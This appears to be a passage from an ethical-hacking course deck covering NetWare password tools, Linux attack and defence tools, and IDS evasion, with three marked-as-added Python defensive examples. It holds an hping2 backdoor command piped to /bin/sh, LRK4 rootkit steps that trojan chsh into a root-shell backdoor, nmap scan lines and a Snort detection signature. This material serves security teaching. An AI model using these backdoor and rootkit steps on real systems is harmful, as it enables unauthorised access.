Hacking Tool: Getit 



© Getit is a hacking tool designed to capture passwords on 
a Novell network. 

© This tool is triggered by an instance of the LOGIN.EXE 
application used in Novell to authenticate and begin a 
login session on a workstation. 

© It works directly at the operating system level, 
intercepting calls to interrupt 21h. It is probably the 
most well known NetWare hacking tool ever created. 
Hacking Tool: Burglar, SetPass 



© Burglar can only be used where an individual has physical 
access to the NetWare file server. 

© The utility is usually stored on a floppy disk. The 
attacker sometimes has to reboot the server. 

© SetPass is a loadable module designed to give the user 
supervisor status. 

© This module also requires physical access to the 
machine. 
Hacking Tool: Spooflog, Novelffs 



http://www.gregmiller.net/novell.html 

© Spooflog is a program, written in C by Greg Miller, that 
can spoof a workstation into believing that it is 
communicating with the server. 

© This is a fairly advanced exploit. 

© Novelffs creates a fake file server. It was written by 
Donar G E Alofs. 

© The machine needs rebooting after the work is done. 
Hacking Tool: Gobbler 



Gobbler is a hacking tool which 'sniffs' network traffic on 
Novell servers. 

Screenshot: GOBBLER.EXE ("The Beholder / DNPAP Network Management 
Monitor, TU Delft, Nov 11 1991") capture status screen, showing the 
dump file pktcapt.dmp, capture buffer usage, the pre-filters (All, IP) 
and the PktCapt / FileView start and stop controls. 



Hacking Tool: Pandora 



© Pandora is a set of tools for hacking, intruding and 
testing the security and insecurity of Novell NetWare 4.x 
and 5.x. Pandora consists of two distinct sets of 
programs: an "online" version and an "offline" version. 

© Features 

• Searches for target servers and grabs user accounts without 
logging in. 

• Multiple DoS attacks and dictionary attacks against user 
accounts. 

• Attaches to the server with password hashes extracted by the offline 
program. 

• Improved spoofing and hijacking by using real-time sniffing. 

• Silently 'reads' files as they are downloaded from server to client. 
Pandora Countermeasure 



© The best protection against this type of attack is 
establishing and enforcing a strong password policy. 

© Physical access to all servers should be prevented. 
Remote management tools like RCONSOLE over SPX 
or RCONJ over TCP/IP should not be used. 

© In a NetWare 5.x environment, the screen saver also gives 
good protection, because the screen saver requires the 
NDS username and password of a user with supervisor 
rights to the server to log in. 
Summary 



© All parts of the overall NetWare system are objects. Each object in 
the security model has an Access Control List, or ACL. Objects are 
clustered together in an overall hierarchy. There are a total of five 
different levels of access that can be logically defined from the 
security model: not logged in, logged in, supervisory access, 
administrative access, and console access. 

© A NetWare server (<= 4.x) by design does not offer much in the 
way of protection, as there is no means of auditing events done at 
the console. This is a physical security concern. 

© There is a security concern in that the Supervisor account password is 
the same as the first password for the Admin user until it is 
changed using a bindery administration utility. 

© Such concerns in Novell are exploited by vigilant attackers. 

© Novell password cracking tools can provide attackers with 
room for further actions. 
Ethical Hacking 



Module XVIII 
Linux Hacking 



Module Objective 



© Why Linux? 

© Compiling Programs in Linux 

© Scanning Networks 

© Mapping Networks 

© Password Cracking in Linux 

© SARA 

© TARA 

© Sniffing 

© A Pinger in disguise 

© Session Hijacking 

© Linux Rootkits 

© IP Chains and IP Tables 

© Linux Security Countermeasures 
Why Linux? 



© The majority of servers around the globe are running on 
Linux/Unix-like platforms. 

© Easy to get and easy on the pocket. 

© There are many types of Linux distributions (distros, 
flavors) such as Red Hat, Mandrake, Yellow Dog, 
Debian etc. 

© Source code is available. 

© Easy to modify. 

© Easy to develop a program on Linux. 
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Compiling Programs in Linux 



• There are generally 3 steps to compiling
programs under Linux:

1. Configuring how the program will be compiled

2. Compiling the program

3. Installing the program

$ ./configure
$ make
$ su
Password:
# make install
# exit






Scanning Networks 



• Once the IP address of a target system is known, an
attacker can begin the process of port scanning, looking
for holes in the system through which the attacker can
gain access.

• A typical system has 2^16 - 1 port numbers, and one TCP
port and one UDP port for each number.

• Each one of these ports is a potential way into the
system.

• The most popular scanning tool for Linux is Nmap.
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Hacking Tool: Nmap 



http://www.insecure.org/nmap

• Stealth Scan, TCP SYN

nmap -v -sS 192.168.0.0/24

• UDP Scan

nmap -v -sU 192.168.0.0/24

• Stealth Scan, No Ping

nmap -v -sS -P0 192.168.0.0/24

• Fingerprint

nmap -v -O 192.168.0.0/24    # TCP/IP stack fingerprint
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Scanning Networks 



• One essential type of tool for
any attacker or defender is the
vulnerability scanner.

• These tools allow the attacker to
connect to a target system and
check for such vulnerabilities as
configuration errors, default
configuration settings that allow
attackers access, and the most
recently reported system
vulnerabilities.

• The preferred open-source tool
for this is Nessus.

• Nessus is an extremely
powerful network scanner. It can
also be configured to run a
variety of attacks.



[Screenshot: Nessus portscanning/attack status. For each target host in the
fr.nessus.org test domain it shows the progress of Portscan, Attack and
Security check, a Stop button, and the plugin currently running (infosrch.cgi,
Netscape Server ?PageServices bug, mstream agent Detect, Quote of the day,
SMB use domain SID to enumerate users), plus a "Stop the whole test" button.]
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Cheops 





[Screenshot: Cheops Network User Interface (menus File, Page, Help; view "Friends")
showing a map of discovered hosts, among them 131.204.208.1, 207.230.72.26 and
207.230.72.8, with the status line "Saved '/root/.cheops-map'".]
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Port scan detection tools 



• Scanlogd - detects and logs TCP port scans.

http://www.openwall.com/scanlogd/

Scanlogd only logs port scans. It does not prevent them.
You will only receive summarized information in the
system's log.

• Abacus Portsentry

http://www.psionic.com/abacus/portsentry/

The portscan detection daemon Portsentry has the ability to
detect port scans (including stealth scans) on the
network interfaces of your server. Upon alarm it can
block the attacker via hosts.deny, a dropped route or a
firewall rule.
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Password Cracking in Linux 



• Xcrack

(http://packetstorm.linuxsecurity.com/Crackers/)

• Xcrack doesn't do much with rules.

• It will find any passwords that match words in the
dictionary file the user provides, but it won't apply any
combinations or modifications of those words.

• It is a comparatively fast tool.
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Hacking Tool: John the Ripper



http://www.openwall.com/john/

• John the Ripper requires the user to have a copy of the
password file.

• This is a relatively fast password cracker, and the most
popular amongst the hacker community.

Cracking times, using the default dictionaries that come
with the Linux system, are as follows:

User ecc with password eccecc took less
than a second.

User root with password doodle took less
than 2 seconds.
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SARA (Security Auditor's Research Assistant)



http://www-arc.com/sara

• The Security Auditor's Research Assistant (SARA) is a
third generation Unix-based security analysis tool that
supports the FBI Top 20 Consensus on Security.

• SARA operates on most Unix-type platforms including
Linux and Mac OS X.

• SARA is the upgrade of the SATAN tool.

• Getting SARA up and running is a straightforward
compilation process, and the rest is done via a browser.
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• http://reptile.rug.ac.be/~coder/sniffit/sniffit.html

• Sniffit is one of the most famous and fastest Ethernet
sniffers for Linux.

• You can run it either on the command line with optional
plug-ins and filters or in interactive mode, which is the
preferred mode.

• The interactive mode of Sniffit allows you to monitor
connections in real-time and therefore sniff in real-time
too!

Note: Remember to download the patch and then
recompile Sniffit for optimum results!



Hacking Tool: HPing2



http://www.hping.org

• Hping is a command-line oriented TCP/IP packet
assembler/analyzer.

• More commonly known for its use as a pinging utility,
HPing carries a hidden but handy usage, that is as a
backdoor Trojan.

• Just enter the following command on your victim:

$ ./hping2 -I eth0 -9 ecc | /bin/sh

Then telnet into any port of your victim and invoke
commands remotely on your victim's host by preceding
any Unix/Linux commands with ecc:

$ telnet victim.com 80

$ eccecho This Text imitates a trojan shovel
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Session Hijacking 



• Using a combination of sniffing and spoofing
techniques, session hijacking tools allow an attacker to
steal a valid, established login session.

• Examples of such sessions are Telnet and FTP
sessions. With a successful session hijacking attempt,
the victim's login session vanishes and he usually
attributes it to network problems and logs in again.

• There are generally two types of session hijacking
techniques:

1. Host-Based Session Hijacking
2. Network-Based Session Hijacking
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Hacking Tool: Hunt 



http://lin.fsid.cvut.cz/~kra/index.html

• One of Hunt's advantages over other session hijacking tools is that
it uses techniques to avoid ACK storms.

• Hunt avoids this ACK storm and the dropping of the connection by
using ARP spoofing to establish the attacker's machine as a relay
between Source and Destination.

• Now the Attacker uses Hunt to sniff the packets the Source and
Destination send over this connection. The Attacker can choose to
act as a relay and forward these packets to their intended
destinations, or he can hijack the session.

• The attacker can type in commands that are forwarded to
Destination but which the Source can't see. Any commands the
Source types in can be seen on the Attacker's screen, but they are
not sent to Destination. Then Hunt allows the attacker to restore
the connection back to the Source when he/she is done with it.
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Linux Rootkits 



• One way an intruder can maintain access to a
compromised system is by installing a rootkit.

• A rootkit contains a set of tools and replacement
executables for many of the operating system's critical
components, used to hide evidence of the attacker's
presence and to give the attacker backdoor access to the
system.

• Rootkits require root access to install, but once set up,
the attacker can get root access back at any time.
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Linux Rootkit v4 (LRK4)



• Linux Rootkit IV is the latest version of a well known trojan package for Linux
systems. The rootkit comes with the following utility programs and trojaned system
commands: bindshell, chfn, chsh, crontab, du, find, fix, ifconfig, inetd, killall,
linsniffer, login, ls, netstat, passwd, pidof, ps, rshd, sniffchk, syslogd, tcpd, top,
wted, z2

• In the example below we will try the change shell command (chsh). Compile only
chsh in the chsh directory and use 'fix' to replace the original with the trojan version.

$ make

gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I.. -DSBINDIR=\"\" -DUSRSBINDIR=\"\" -DLOGDIR=\"\" -DVARPATH=\"\" chsh.c -o chsh.o

gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I.. -DSBINDIR=\"\" -DUSRSBINDIR=\"\" -DLOGDIR=\"\" -DVARPATH=\"\" setpwnam.c -o setpwnam.o

gcc -s -N chsh.o setpwnam.o -o chsh

$ ../fix /usr/bin/chsh ./chsh ../backup/chsh

• Once done, the chsh command will spawn a root shell to any user who logs on to
the Linux system.
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Rootkit Countermeasures 



chkrootkit is a tool to
locally check for signs of
a rootkit.

It contains chkrootkit, a
shell script that checks
system binaries for
rootkit modification.

http://www.chkrootkit.org/

chkrootkit detects the following rootkits:

lrk3, lrk4, lrk5, lrk6 (and some variants); Solaris rootkit; FreeBSD rootkit;
t0rn (including some variants and t0rn v8); Ambient's Rootkit for Linux (ARK);
Ramen Worm; rh[67]-shaper; RSHA; Romanian rootkit; RK17; Lion Worm;
Adore Worm; LPD Worm; kenny-rk; Adore LKM; ShitC Worm; Omega Worm;
Wormkit Worm; Maniac-RK; dsc-rootkit; Ducoci rootkit; x.c Worm; RST.b trojan;
duarawkz; knark LKM; Monkit; Hidrootkit; Bobkit; Pizdakit; t0rn (v8.0 variant);
Showtee; Optickit; T.R.K; MithRa's Rootkit; George; Scalper (FreeBSD/Apache
chunked encoding worm); Slapper A, B, C and D (Linux/Apache mod_ssl Worm);
OpenBSD rk v1; Illogic rootkit; SK rootkit; sebek LKM; Romanian rootkit;
LOC rootkit.
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Linux Firewall: IPChains 



• IPChains is a very general TCP/IP packet filter. It allows
you to ACCEPT, DENY, MASQ, REDIRECT, or
RETURN packets.

• There are three chains that are always defined: input,
output and forward.

• Each chain is executed at a particular point in a packet's path:

  • the input chain is executed whenever a packet is destined for
  a network interface

  • the output chain is executed whenever a packet is exiting a
  network interface, destined elsewhere

  • the forward chain is executed whenever a packet must traverse
  between multiple interfaces

• Chains are just rule sets that are executed in order;
whenever a packet matches a rule, that specific
target is executed.
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• IPTables is the replacement of the userspace tool ipchains
in the Linux 2.4 kernel and beyond. IPTables has many
more features than IPChains:

• Connection tracking capability, i.e. the ability to do
stateful packet inspection.

• Simplified behavior of packets negotiating the built-in
chains (INPUT, OUTPUT and FORWARD).

• A clean separation of packet filtering and network
address translation (NAT).

• Rate-limited connection and logging capability.

• The ability to filter on TCP flags and TCP options, and also
MAC addresses.



Linux Tools: Application Security



• Whisker (http://www.wiretrip.net)

Rain.Forest.Puppy's excellent CGI vulnerability scanner.

• Flawfinder (http://www.dwheeler.com/flawfinder/)

Flawfinder is a Python program which searches through source code for
potential security flaws, listing potential security flaws sorted by risk, with the
most potentially dangerous flaws shown first. This risk level depends not only on
the function, but on the values of the parameters of the function.

• StackGuard (http://www.immunix.org)

StackGuard is a compiler that emits programs hardened against "stack smashing"
attacks. Stack smashing attacks are a common form of penetration attack.
Programs that have been compiled with StackGuard are largely immune to stack
smashing attacks. Protection requires no source code changes at all.

• Libsafe (http://www.avayalabs.com/project/libsafe/index.html)

It is generally accepted that the best solution to buffer overflow and format string
attacks is to fix the defective programs.
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Linux Tools: Intrusion Detection Systems



• Tripwire (http://www.tripwire.com)

A file and directory integrity checker.

• LIDS (http://www.turbolinux.com.cn/lids/)

The LIDS (Linux Intrusion Detection System) is an intrusion detection
/ defense system in the Linux kernel. The goal is to protect Linux systems by
disabling some system calls in the kernel itself.

• AIDE (http://www.cs.tut.fi/~rammer/aide.html)

AIDE (Advanced Intrusion Detection Environment) is an Open Source IDS
package.

• Snort (http://www.snort.org)

Flexible packet sniffer/logger that detects attacks. Snort is a libpcap-based
packet sniffer/logger which can be used as a lightweight Network Intrusion
Detection System.

• Samhain (http://samhain.sourceforge.net)

Samhain is designed for intuitive configuration and tamper-resistance, and
can be configured as a client/server application to monitor many hosts on a
network from a single central location.
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Linux Tools: Security Testing Tools 






• NMap (http://www.insecure.org/nmap)

Premier network auditing and testing tool.

• LSOF (ftp://vic.cc.purdue.edu/pub/tools/unix/lsof)

LSOF lists open files for running Unix/Linux processes.

• Netcat (http://www.atstake.com/research/tools/index.html)

Netcat is a simple Unix utility which reads and writes data across network
connections, using the TCP or UDP protocol.

• Hping2 (http://www.kyuzz.org/antirez/hping/)

hping2 is a network tool able to send custom ICMP/UDP/TCP packets
and to display target replies like ping does with ICMP replies.

• Nemesis (http://www.packetninja.net/nemesis/)

The Nemesis Project is designed to be a command-line based, portable
human IP stack for Unix/Linux.
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Linux Tools: Encryption 



• Stunnel (http://www.stunnel.org)

Stunnel is a program that allows you to encrypt arbitrary TCP
connections inside SSL (Secure Sockets Layer), available on both Unix
and Windows. Stunnel can allow you to secure non-SSL aware
daemons and protocols (like POP, IMAP, NNTP, LDAP, etc.) by having
Stunnel provide the encryption, requiring no changes to the daemon's
code.

• OpenSSH / SSH (http://www.openssh.com/)

SSH (Secure Shell) is a program for logging into a remote machine and
for executing commands on a remote machine. It provides secure
encrypted communications between two untrusted hosts over an
insecure network.

• GnuPG (http://www.gnupg.org)

GnuPG is a complete and free replacement for PGP. Since it does not
use the patented IDEA algorithm, it can be used without any
restrictions.






Linux Tools: Log and Traffic Monitors 



• MRTG (http://www.mrtg.org)

The Multi-Router Traffic Grapher (MRTG) is a tool to monitor the
traffic load on network links.

• Swatch (http://www.stanford.edu/~atkins/swatch/)

Swatch, the simple watch daemon, is a program for Unix system
logging.

• Timbersee (http://www.fastcoder.net/~thumper/software/sysadmin/timbersee/)

Timbersee is a program very similar to the Swatch program.

• Logsurf (http://www.cert.dfn.de/eng/logsurf/)

The program logsurfer was designed to monitor any text-based
logfiles on the system in real time.

• TCP Wrappers (ftp://ftp.porcupine.org/pub/security/index.html)

Wietse Venema's network logger, also known as TCPD or LOG_TCP.
These programs log the client hostname of incoming telnet, ftp, rsh,
rlogin, finger etc. requests.
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Linux Tools: Log and Traffic Monitors 



• IPLog (http://ojnk.sourceforge.net/)

iplog is a TCP/IP traffic logger. Currently, it is capable of logging
TCP, UDP and ICMP traffic.

• IPTraf (http://cebu.mozcom.com/riker/iptraf/)

IPTraf is an ncurses based IP LAN monitor that generates various
network statistics including TCP info, UDP counts, ICMP and
OSPF information, Ethernet load info, node stats, IP checksum
errors and others.

• Ntop (http://www.ntop.org)

ntop is a Unix/Linux tool that shows the network usage, similar to
what the popular "top" Unix/Linux command does.
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Linux Security Countermeasures



Physical Security:

Lock your computer physically in a secure place.

Password Security:

Do not assign easy-to-guess passwords.

Do not share your account with another person.

Check for user accounts with a null passwd (without passwd) in /etc/shadow.

Network Security:

Close the door first by denying access from the network, by default.
$ echo "ALL: ALL" >> /etc/hosts.deny

Stop all unused services such as sendmail, NFS.

$ chkconfig --list

$ chkconfig --del sendmail

$ chkconfig --del nfslock

$ chkconfig --del rpc

Check system logs in /var/log regularly, especially /var/log/secure.

Update your Linux system regularly.
Check the errata (bug fixes) at
http://www.redhat.com/support/errata

The update packages can be found at ftp://updates.redhat.com
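A check for the "null passwd" item above, as an added example that is not part of the course material: it parses shadow-format lines and reports accounts whose password field is empty. The sample entries and the hash strings in them are constructed placeholders, not real password hashes.

```python
"""Audit /etc/shadow entries for accounts with a null (empty) password.

Added example, not part of the course material: it parses shadow(5)-format
lines and reports each account as 'null' (empty password field, logs in
with no password at all), 'locked' (field starts with '!' or is '*') or
'set'. The sample entries below are constructed; the hash values in them
are placeholders, not real password hashes.
"""
import sys
from typing import Dict, List

# Constructed sample in shadow(5) layout:
# name:password:lastchg:min:max:warn:inactive:expire:flag
SAMPLE_SHADOW = """\
root:$6$PLACEHOLDER$hashgoeshere:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
guest::19000:0:99999:7:::
ecc:!$6$PLACEHOLDER$lockedhash:19000:0:99999:7:::
backup:!!:19000:0:99999:7:::
tester:$1$PLACEHOLDER$oldhash:19000:0:99999:7:::
"""


def classify(password_field: str) -> str:
    """Map the shadow password field to null / locked / set."""
    if password_field == "":
        return "null"          # anyone can log in as this user without a password
    if password_field.startswith("!") or password_field == "*":
        return "locked"        # password login disabled
    return "set"


def audit_shadow(text: str) -> Dict[str, List[str]]:
    """Group account names by password state; malformed lines are skipped."""
    result: Dict[str, List[str]] = {"null": [], "locked": [], "set": []}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            print(f"line {lineno}: malformed, skipped", file=sys.stderr)
            continue
        result[classify(fields[1])].append(fields[0])
    return result


def null_password_accounts(text: str) -> List[str]:
    """Just the accounts that would let anyone in without a password."""
    return audit_shadow(text)["null"]


if __name__ == "__main__":
    # with a path argument (e.g. /etc/shadow, readable by root only) the
    # real file is audited; without one the constructed sample is used
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path).read() if path else SAMPLE_SHADOW
    report = audit_shadow(data)
    for state, names in report.items():
        print(f"{state:6s}: {', '.join(names) or '-'}")
    # non-zero exit when a null password exists, so the check can run from cron
    sys.exit(1 if report["null"] else 0)
```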
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Summary 



• Linux is gaining popularity and is fast becoming a stable, industry
strength OS.

• Once the IP address of a target system is known, an attacker can
begin port scanning, looking for holes in the system for gaining
access, Nmap being a popular tool.

• Password cracking tools are available for Linux as well.

• Sniffers as well as packet assembly/analyzing tools for Linux
provide attackers with the same edge that they have dealing with other
OSs.

• Attackers with root privileges can engage in session hijacking as
well.

• Trojans, backdoors and worms are also prevalent in the Linux
environment.

• As with any other system, a well developed, integrated procedure is
to be put in place to counter the threats that exist.
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Ethical Hacking 



Module XIX

Evading IDS, Firewalls
and Honeypots



Module Objective 



• Intrusion Detection Systems
• System Integrity Verifiers
• How are Intrusions Detected?
• Anomaly Detection
• Signature Recognition

• How does an IDS match Signatures with incoming
Traffic?

• Protocol Stack Verification

• Application Protocol Verification

• Hacking Through Firewalls

• IDS Software Vendors

• Honey Pots
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Intrusion Detection Systems (IDS)



• An Intrusion Detection System (IDS) monitors packets on
the network wire and attempts to discover if a
hacker/cracker is attempting to break into a system (or
cause a denial of service attack).

• A typical example is a system that watches for a large
number of TCP connection requests (SYN) to many
different ports on a target machine, thus discovering if
someone is attempting a TCP port scan.
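The port scan heuristic described here, which is also what the port scan detection tools (scanlogd, Portsentry) in the Linux module rely on, as an added example that is not any of those tools' code: a sliding-window detector that flags a source contacting many distinct ports within a few seconds. The log format, the threshold, the window and the sample records are constructed assumptions.

```python
"""Port scan detection over connection-attempt records.

Added example, not code from the course material, scanlogd or Portsentry:
it flags a source that contacts many distinct destination ports within a
short window, the heuristic the IDS example above and the port scan
detection tools in the Linux module describe. The log format, threshold,
window and sample records are constructed assumptions, not any tool's
defaults.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class Attempt:
    ts: float    # seconds since epoch
    src: str     # source IP address
    dport: int   # destination TCP port


class PortScanDetector:
    """Sliding-window detector: at most one alert per source."""

    def __init__(self, port_threshold: int = 10, window_s: float = 5.0):
        self.port_threshold = port_threshold
        self.window_s = window_s
        # per-source history of (timestamp, dport), oldest first
        self._history: Dict[str, Deque[Tuple[float, int]]] = defaultdict(deque)
        self._alerted: Set[str] = set()

    def observe(self, attempt: Attempt) -> Optional[str]:
        """Record one SYN; return an alert string when the threshold is crossed."""
        hist = self._history[attempt.src]
        hist.append((attempt.ts, attempt.dport))
        # discard entries that have fallen out of the window
        while hist and attempt.ts - hist[0][0] > self.window_s:
            hist.popleft()
        distinct = {port for _, port in hist}
        if len(distinct) >= self.port_threshold and attempt.src not in self._alerted:
            self._alerted.add(attempt.src)
            return (f"portscan from {attempt.src}: {len(distinct)} distinct ports "
                    f"in {self.window_s:.0f}s (ports {min(distinct)}-{max(distinct)})")
        return None


def parse_line(line: str) -> Attempt:
    """Parse the constructed format '<ts> <src> -> <dst>:<dport> SYN'."""
    ts, src, _arrow, dst_port, _flag = line.split()
    return Attempt(float(ts), src, int(dst_port.rsplit(":", 1)[1]))


def scan_log(lines: List[str], **detector_kwargs) -> List[str]:
    """Run the detector over log lines and collect the alerts it raises."""
    detector = PortScanDetector(**detector_kwargs)
    alerts = []
    for line in lines:
        alert = detector.observe(parse_line(line))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample: 10.0.0.7 sweeps twelve ports in under two seconds, while
# 10.0.0.9 makes twelve ordinary connections to a single web server port.
SAMPLE_LOG = [
    f"{1000.0 + i * 0.15:.2f} 10.0.0.7 -> 10.0.0.1:{20 + i} SYN" for i in range(12)
] + [
    f"{1000.0 + i * 0.5:.2f} 10.0.0.9 -> 10.0.0.1:80 SYN" for i in range(12)
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```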
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System Integrity Verifiers (SIV)



• System Integrity
Verifiers (SIV) monitor
system files to find when
an intruder changes them.

• Tripwire is one of the
popular SIVs.

• SIVs may watch other
components such as the
Windows registry as well
as cron configuration to
find known signatures.
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[Flowchart: Tripwire workflow]

1. Install & Customize Tripwire
2. Initialize Tripwire Database
3. Run Integrity Check
4. Examine Tripwire Report
5. Take Appropriate Security Measures
6. Update Tripwire Database
7. Update Policy File

(The chart branches with Yes/No decisions after the report and loops back to
the integrity check.)
Intrusion Detection



Anomaly Detection

• The idea behind this
approach is to measure a
"baseline" of such stats as
CPU utilization, disk
activity, user logins, file
activity, and so forth.

• The benefit of this
approach is that it can
detect the anomalies
without having to
understand the underlying
cause behind the
anomalies.



Signature Recognition

• This means that for every
hacker technique, the
engineers code something
into the system for that
technique.

• This can be as simple as a
pattern match. The classic
example is to examine
every packet on the wire for
the pattern "/cgi-bin/phf?"
which indicates an attempt
to access this vulnerable
CGI script on a web server.
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How does an IDS match signatures with incoming traffic?



• Traffic consists of IP datagrams flowing across
a network.

• An IDS is able to capture those packets as they
flow by on the wire.

• An IDS consists of a special TCP/IP stack that
reassembles IP datagrams and TCP streams. It
then applies some of the following techniques:

  • Protocol stack verification

  • Application protocol verification

  • Creating new loggable events
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



Protocol Stack Verification



• A number of intrusions,
such as "Ping-O-Death"
and "TCP Stealth
Scanning", use violations
of the underlying IP,
TCP, UDP and ICMP
protocols in order to
attack the machine.

• A simple verification
system can flag invalid
packets. This can include
valid, but suspicious,
behavior such as
severely fragmented IP
packets.
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Application Protocol Verification 



• A number of intrusions use invalid protocol behavior,
such as "WinNuke", which uses the NetBIOS protocol
(adding OOB data), or DNS cache poisoning, which has a
valid but unusual signature.

• In order to effectively detect these intrusions, an IDS
must re-implement a wide variety of application-layer
protocols in order to detect suspicious or invalid
behavior.
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What happens after an IDS detects an attack?



1. Configure the firewall to filter out the IP address of the intruder.

2. Alert the user / administrator (sound / e-mail / page).

3. Write an entry in the event log. Send an SNMP Trap datagram
to a management console like HP OpenView or Tivoli.

4. Save the attack information (timestamp, intruder IP address,
victim IP address/port, protocol information).

5. Save a tracefile of the raw packets for later analysis.

6. Launch a separate program to handle the event.

7. Terminate the TCP session - forge a TCP FIN packet to force the
connection to terminate.
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IDS Software Vendors



• BlackICE by Network ICE (http://www.networkice.com)

• CyberCop Monitor by Network Associates, Inc.
(http://www.nai.com)

• RealSecure by Internet Security Systems (ISS)
(http://www.iss.net)

• NetRanger by WheelGroup/Cisco (http://www.wheelgroup.com)

• eTrust Intrusion Detection by Computer Associates
(http://www.cai.com)

• NetProwler by Axent (http://www.axent.com)

• Centrax by Cybersafe (http://www.cybersafe.com)

• NFR by Network Flight Recorder (http://www.nfr.net)

• Dragon by Security Wizards (http://www.network-defense.com)
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Snort (http://www.snort.org) 



• Snort is an Open Source Intrusion Detection System.

• It contains over a thousand signatures, and can be downloaded at
http://www.snort.org/cgi-bin/done.cgi

• Check out the following example:

In this example of PHF attack detection, a straight text string is
searched for in the application layer:

alert tcp any any -> 192.168.1.0/24 80 (msg: "PHF attempt"; content: "/cgi-bin/phf";)

It gives an alert on a TCP connection from any IP address and
any port to port 80 on the 192.168.1.x subnet.

It searches for the content "/cgi-bin/phf" anywhere in the payload.
If it finds such content, it will alert the console with the message
"PHF attempt".
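The matching the rule above performs, as an added example that is not Snort's code: a small parser for this rule's syntax and a matcher applied to constructed packets, showing which header fields gate the application-layer content search. Only the rule syntax used on this slide is supported; the packets and addresses are constructed.

```python
"""Minimal Snort-style signature matcher.

Added example, not Snort's code: it parses the PHF rule shown above
(action, protocol, source/destination addresses and ports, msg and content
options) and applies it to constructed packet records, to show which
header fields gate the application-layer content search. Only the rule
syntax used on this slide is supported.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

RULE_RE = re.compile(
    r"^(?P<action>alert|log|pass)\s+(?P<proto>tcp|udp|icmp|ip)\s+"
    r"(?P<src>\S+)\s+(?P<sport>\S+)\s+->\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*"
    r"\((?P<opts>.*)\)\s*$"
)


@dataclass
class Packet:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes


class Rule:
    def __init__(self, text: str):
        m = RULE_RE.match(text.strip())
        if not m:
            raise ValueError(f"unsupported rule syntax: {text!r}")
        self.action, self.proto = m["action"], m["proto"]
        self.src, self.sport = m["src"], m["sport"]
        self.dst, self.dport = m["dst"], m["dport"]
        self.msg: Optional[str] = None
        self.content: Optional[bytes] = None
        # options are 'key: value;' pairs; only msg and content are handled
        for opt in m["opts"].split(";"):
            key, _, val = opt.partition(":")
            key, val = key.strip(), val.strip().strip('"')
            if key == "msg":
                self.msg = val
            elif key == "content":
                self.content = val.encode()

    @staticmethod
    def _addr_ok(spec: str, addr: str) -> bool:
        if spec == "any":
            return True
        return ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)

    @staticmethod
    def _port_ok(spec: str, port: int) -> bool:
        return spec == "any" or int(spec) == port

    def match(self, pkt: Packet) -> Optional[str]:
        """Return the alert message when header fields and content all match."""
        if pkt.proto != self.proto:
            return None
        if not (self._addr_ok(self.src, pkt.src) and self._port_ok(self.sport, pkt.sport)):
            return None
        if not (self._addr_ok(self.dst, pkt.dst) and self._port_ok(self.dport, pkt.dport)):
            return None
        # the content search runs only after the cheap header checks pass
        if self.content is not None and self.content not in pkt.payload:
            return None
        return self.msg or "(no msg)"


PHF_RULE = 'alert tcp any any -> 192.168.1.0/24 80 (msg: "PHF attempt"; content: "/cgi-bin/phf";)'

# Constructed packets: a PHF probe into the monitored subnet, a benign
# request to the same host, and a PHF probe to a host outside the subnet.
SAMPLE_PACKETS = [
    Packet("tcp", "203.0.113.5", 40001, "192.168.1.10", 80,
           b"GET /cgi-bin/phf?Qalias=test HTTP/1.0\r\n\r\n"),
    Packet("tcp", "203.0.113.5", 40002, "192.168.1.10", 80,
           b"GET /index.html HTTP/1.0\r\n\r\n"),
    Packet("tcp", "203.0.113.5", 40003, "10.1.1.10", 80,
           b"GET /cgi-bin/phf HTTP/1.0\r\n\r\n"),
]


def run_rule(rule_text: str, packets: List[Packet]) -> List[Tuple[str, Optional[str]]]:
    """Apply one rule to every packet; returns (destination, alert-or-None) pairs."""
    rule = Rule(rule_text)
    return [(p.dst, rule.match(p)) for p in packets]


if __name__ == "__main__":
    for dst, msg in run_rule(PHF_RULE, SAMPLE_PACKETS):
        print(f"{dst:14s} {msg or '-'}")
```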
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Evading IDS Systems



• Many simple network intrusion detection systems rely
upon "pattern matching".

• Attack scripts have well known patterns, so simply
compiling a database of the output of known attack
scripts provides pretty good detection, but can easily be
evaded by simply changing the script.

• IDS evasion focuses on foiling signature matching by
altering an attacker's appearance.

For example, some POP3 servers are vulnerable to a
buffer overflow when a long password is entered. It is
easy to evade detection simply by changing the attack script.
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Complex IDS Evasion



• An intruder might send a TCP SYN packet that the IDS sees, but
the victim host never sees.

• This causes the IDS to believe the connection is closed, when in
fact it is not. Since TCP connections do not send "keep-alives", the
intruder could wait hours or days after this "close" before
continuing the attack.

• The first attack is to find a way to pass packets as far as the IDS,
and cause a later router to drop the packets.

• This depends upon the router configuration, but typical examples
include low TTL fields, fragmentation, source routing, and other IP
options.

• If there is a slow link past the IDS, then the hacker can flood the
link with high priority IP packets, and send the TCP FIN as a low
priority packet - the router's queuing mechanism will likely drop
the packet.
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Hacking Tool: fragrouter



• Fragrouter is a program for routing network traffic in
such a way as to elude most network intrusion detection
systems.

• Fragrouter allows attacks to avoid detection by network
intrusion detection systems.

• For example, Fragrouter could be used to obfuscate a
phf attack against a web server, a buffer overflow attack
against a DNS server, or any number of other attacks.

fragrouter [ -i interface ] [ -p ] [ ATTACK ] host
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Hacking Tool: Tcpreplay



http://sourceforge.net/projects/tcpreplay/

• Tcpreplay is a set of UNIX tools which allow the
replaying of captured network traffic.

• It can be used to test a variety of network devices
including routers, firewalls, and NIDS.

tcpreplay [ -i intf ] [ -l loop count ] [ -r rate | -m multiplier ] file ...
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Hacking Tool: SideStep.exe 



http://www.robertgraham.com/tmp/sidestep.html

• Sidestep is a hacking tool which evades network IDS in a
completely different manner compared to fragrouter.

C:\>sidestep

Sidestep v1.0 Copyright (c) 2000 by Network ICE
http://www.robertgraham.com/tmp/sidestep.html
usage:

sidestep <target> [<options>]
